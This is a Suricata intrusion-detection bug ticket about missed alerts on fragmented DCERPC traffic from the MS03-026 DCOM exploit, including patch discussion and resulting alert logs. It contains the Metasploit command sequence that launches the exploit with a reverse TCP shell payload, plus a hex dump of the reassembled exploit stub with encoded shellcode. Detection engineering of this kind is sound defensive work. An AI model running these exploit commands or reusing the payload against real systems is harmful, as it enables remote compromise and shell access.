Project

General

Profile

Actions

Bug #206

closed

Missed detection when dealing with fragmented RPC traffic (ms03-026)

Added by Will Metcalf about 12 years ago. Updated almost 12 years ago.

Status:
Closed
Priority:
Normal
Assignee:
Target version:
Affected Versions:
Effort:
Difficulty:
Label:

Description

The attached pcap is generated from metasploit for ms03-026. We seem to alert properly for all available evasion techniques in metasploit except for the use of rpc frags. Setting the following we only alert on the cmd banner post exploitation.

use exploit/windows/dcerpc/ms03_026_dcom
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.78.254
set RHOST 192.168.78.21
set DCERPC::ReadTimeout 65535
set DCERPC::max_frag_size 20
exploit

src/suricata -s ../current-all-blah-newer.rules -l ./ -c suricata.yaml -r ms03_026_dcom-max_frag_size.pcap

exploitation is successful and we get..

07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]

we should see..

07/07/10-20:35:03.679795 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://www.securityfocus.com/bid/8205][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0352][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0715][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx]
07/07/10-20:35:03.679795 [**] [1:2002908:4] ET EXPLOIT x86 JmpCallAdditive Encoder [**] [Classification: Executable code was detected] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://doc.emergingthreats.net/bin/view/Main/2002908][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders]
07/07/10-20:35:03.791672 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]


Files

Actions #1

Updated by Kirby Kuehl about 12 years ago

Will, can you try this again with the patch contained in Bug ID #200.

Actions #2

Updated by Will Metcalf about 12 years ago

Still missing detection for this one.

Actions #3

Updated by Kirby Kuehl about 12 years ago

This patch fixes handling multiple DCERPC fragments within a single packet.
When dumping the UUID and the fully assembled DCERPC fragment, everything looks the same as the fully reassembled packet shown in frame 14 of this ticket's pcap. The attached patch is critical.

Actions #4

Updated by Kirby Kuehl about 12 years ago

The alert:
sid:3409 in VRT rules

The UUID suricata decodes:

BIND UUID [ 0] Accepted 4d9f4ab87d1c11cf861e0020af6e7c57 Major Version 0x0000 Minor Version 0x0000


The opnum suricata decodes:
Opnum 0x00

The fully reassembled stubdata:
[0000]   05 00 01 00 00 00 00 00   00 00 00 00 C4 5E 74 E5   ........ ......t.
[0010]   D8 56 3D 46 D4 64 88 E1   8E 3F 4E AC 00 00 00 00   .V.F.d.. ..N.....
[0020]   00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0030]   34 A6 AB 12 FD 02 00 00   00 00 00 00 FD 02 00 00   4....... ........
[0040]   5C 00 5C 00 0B F9 43 49   34 3F 1D 0C 4E 67 25 91   ......CI 4...Ng..
[0050]   BA BB B4 05 4F 47 66 35   B7 BE 98 BF 7D 04 2C 9F   ....OGf5 ........
[0060]   B3 D4 32 FC EB 10 EB 19   C6 16 00 01 23 37 F3 77   ..2..... .....7.w
[0070]   EB E0 FD 7F 15 79 04 BB   90 71 27 91 9B BE 09 F8   .....y.. .q......
[0080]   9F 46 4B 99 D5 7E 14 2A   E1 39 EB 35 B6 B0 98 B5   .FK..... .9.5....
[0090]   3B FD F5 4A 4F 05 7F 1D   B4 A8 43 A9 42 BB 03 D4   ...JO... ..C.B...
[00a0]   49 80 FC B3 B8 93 BA 04   4E 7C 19 F9 3D 40 66 41   I....... N.....fA
[00b0]   3C B1 3A E2 15 0C B7 34   25 47 1C 8D 96 BF 67 97   .......4 .G....g.
[00c0]   92 37 B9 2D 90 48 24 B2   2C 33 D6 3F EB 04 51 F4   .7...H.. .3....Q.
[00d0]   25 AD 4E EB 04 9F 4B FD   A8 96 EB 04 EB 04 97 96   ..N...K. ........
[00e0]   1C 47 EB 04 B8 D7 25 46   97 71 05 88 E1 41 A8 78   .G.....F .q...A.x
[00f0]   47 33 F5 7F 2C 98 49 14   B6 40 89 E3 7B 39 F6 D1   G3....I. .....9..
[0100]   E0 41 79 72 02 EB 35 B1   B4 3D 8D 86 D6 7E 20 E1   .Ayr..5. ........
[0110]   77 7C 25 28 D4 B0 3F A8   75 47 B5 0B F5 7A 6B F9   w....... uG...zk.
[0120]   98 10 F8 93 BF 4F 71 3C   B6 03 D5 92 B3 B7 04 74   .....Oq. .......t
[0130]   2C 9F 66 46 73 05 34 80   FD 22 FC B8 99 1C 37 2D   ..fFs.4. ......7.
[0140]   7F 15 0C 70 1D 4A 4B 96   A9 7D 43 B2 BA 76 78 4E   ...p.JK. ..C..vxN
[0150]   B9 BE BB 84 E2 42 90 91   14 40 48 67 97 49 9B 24   .....B.. ..Hg.I..
[0160]   74 79 75 73 21 E1 27 BA   27 B2 91 7C 4B 2D BB B9   tyus.... ....K...
[0170]   A8 05 1C 37 81 FE C1 EB   3F 66 47 1D 04 2B F5 93   ...7.... .fG.....
[0180]   70 69 FC B8 96 08 FD 41   98 B5 25 01 F9 48 0C 3D   pi.....A .....H..
[0190]   78 3C 77 0B D4 7A 46 34   B0 B1 BE 33 D6 8D 86 E2   x.w..zF4 ...3....
[01a0]   42 39 E3 72 49 7F 35 4F   4E A9 2C 76 7E 15 9B B7   B9.rI.5O N..v....
[01b0]   12 F8 92 67 B4 B6 9F 24   99 BF 43 B3 4A 97 71 40   ...g.... ..C.J.q.
[01c0]   90 7D 7B 2B D1 E0 14 66   23 D5 76 7F 7B 43 A9 15   .......f ..v..C..
[01d0]   A8 7E 4A 73 1D B3 31 E2   7A 4B 99 77 22 F5 3C 7C   ..Js..1. zK.w....
[01e0]   46 B2 71 41 09 F8 2D 97   74 38 D6 BF B7 78 29 EB   F.qA.... t8...x..
[01f0]   42 70 30 E0 27 72 18 E1   47 96 37 3D BA 49 4F B9   Bp0..r.. G.7..IO.
[0200]   B5 91 98 25 1C 48 21 F6   D5 8D 40 34 B6 67 2C BB   .....H.. ...4.g..
[0210]   75 24 BE 93 4E B0 3A D4   92 90 19 E3 3B FD B4 0C   u...N... ........
[0220]   9F 04 B8 B1 83 D3 D0 FC   7D 35 3F 14 79 05 9B 87   ........ .5..y...
[0230]   F9 4E 70 71 7D 79 01 D6   89 EB 27 BE A9 97 BA 11   .Npq.y.. ........
[0240]   E3 6B D4 8C E2 73 43 B4   84 E1 72 7F 41 7C 76 74   .k...sC. ..r.A.vt
[0250]   32 D5 1C 05 A8 14 B6 35   92 25 0C B1 B5 B9 9B 40   2......5 ........
[0260]   9F 78 48 98 47 2A F5 66   BB 10 F9 81 E0 04 1B F8   .xH.G..f ........
[0270]   2D 75 7E 77 46 BF 7A 4F   7B 34 37 96 3D 4B 7E 13   .u.wF.zO .47..K..
[0280]   F7 E0 77 2C 93 B3 88 FC   7D 3C 78 28 E2 08 E1 02   ..w..... ..x.....
[0290]   EB 15 76 03 D2 E3 4A 91   99 B7 7C 24 90 67 B2 85   ..v...J. .....g..
[02a0]   FD B0 75 3F 71 65 72 4D   4A 79 77 76 69 72 66 50   ..u.qerM JywvirfP
[02b0]   4B 75 4B 66 34 61 34 6C   77 31 4C 6C 43 31 39 63   KuKf4a4l w1LlC19c
[02c0]   6A 4D 66 4B 78 52 51 58   4E 47 76 66 75 55 45 4C   jMfKxRQX NGvfuUEL
[02d0]   4F 33 6D 4F 4D 6E 30 49   61 70 7A 4A 46 41 61 45   O3mOMn0I apzJFAaE
[02e0]   67 58 72 33 6F 57 6D 63   6B 58 30 6B 45 78 76 30   gXr3oWmc kX0kExv0
[02f0]   6B 53 73 59 6E 52 39 4E   4C 43 74 59 65 4E 6D 7A   kSsYnR9N LCtYeNmz
[0300]   4E 4A 49 6E 37 57 46 78   42 70 4D 75 63 32 45 56   NJIn7WFx BpMuc2EV
[0310]   44 64 41 4E 41 71 6A 5A   74 4B 48 77 52 71 7A 53   DdANAqjZ tKHwRqzS
[0320]   5A 69 30 6A 36 68 30 55   55 6D 51 6C 65 30 4A 44   Zi0j6h0U UmQle0JD
[0330]   4A 4D 37 42 32 77 58 39   52 35 38 57 66 6B 6B 63   JM7B2wX9 R58Wfkkc
[0340]   79 37 6A 57 52 61 59 73   46 6E 4D 7A 49 59 76 62   y7jWRaYs FnMzIYvb
[0350]   49 41 4D 5A 37 32 65 6A   6D 56 69 73 72 50 61 76   IAMZ72ej mVisrPav
[0360]   33 7A 4F 61 5A 59 4A 59   30 6D 32 35 34 63 45 4B   3zOaZYJY 0m254cEK
[0370]   78 33 8B 45 30 05 24 FB   FF FF FF E0 EB F4 64 64   x3.E0... ......dd
[0380]   0B 0B 1B 00 56 78 49 72   61 66 45 32 46 37 44 68   ....VxIr afE2F7Dh
[0390]   6D 79 72 47 32 61 66 35   55 78 65 73 34 50 4D 71   myrG2af5 Uxes4PMq
[03a0]   31 69 33 49 45 71 78 43   62 4A 77 54 58 76 44 78   1i3IEqxC bJwTXvDx
[03b0]   76 66 37 73 61 31 6F 57   EB 06 55 55 59 1C 00 01   vf7sa1oW ..UUY...
[03c0]   8B 44 24 FC 05 E0 FA FF   FF FF E0 33 74 33 4A 50   .D...... ...3t3JP
[03d0]   6D 77 63 77 4F 4A 6F 49   46 45 54 4F 66 78 36 5A   mwcwOJoI FETOfx6Z
[03e0]   58 50 75 69 6D 4E 47 47   48 4C 31 67 72 76 5C 00   XPuimNGG HL1grv..
[03f0]   00 00 00 00 00 00 00 00   FF 6A C0 26 E7 72 F4 A0   ........ .j...r..
[0400]   01 00 00 00 54 F7 3E CD   01 00 00 00 94 5E 5A 50   ....T... ......ZP
[0410]   D0 86 24 28 37 75 B1 45   01 FF D7 8B 01 00 00 00   ....7u.E ........
[0420]   01 00 00 00 32 8B 60 C6                             ....2... 

Actions #5

Updated by Victor Julien about 12 years ago

Applied, thanks Kirby. What else needs to be done?

Actions #6

Updated by Victor Julien about 12 years ago

  • % Done changed from 50 to 80

Current master alerts on 3409 and 2123. Sig 2002908 doesn't fire.

Actions #7

Updated by Victor Julien about 12 years ago

  • Estimated time changed from 2.50 h to 12.50 h
Actions #8

Updated by Victor Julien about 12 years ago

  • Due date changed from 07/10/2010 to 08/23/2010
  • Target version changed from 1.0.1 to 1.0.2
  • Estimated time changed from 12.50 h to 15.00 h

Reverted to the old code in git master as we found too many issues. Re-targeting to 1.0.2.

Actions #9

Updated by Victor Julien about 12 years ago

  • Due date changed from 08/23/2010 to 09/15/2010
  • Target version changed from 1.0.2 to 1.1beta1
Actions #10

Updated by Victor Julien almost 12 years ago

  • Status changed from New to Closed
  • % Done changed from 80 to 100

Now getting:

07/07/10-20:30:26.365349 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {TCP} 192.168.78.254:52952 -> 192.168.78.21:135
07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {TCP} 192.168.78.21:1040 -> 192.168.78.254:4444

Sid 2002908 doesn't match, but I think I shouldn't on this pcap. Btw, the alerts in the original report show a tcp session that is not present in the pcap: 192.168.78.254:47683 -> 192.168.78.21:135

Actions

Also available in: Atom PDF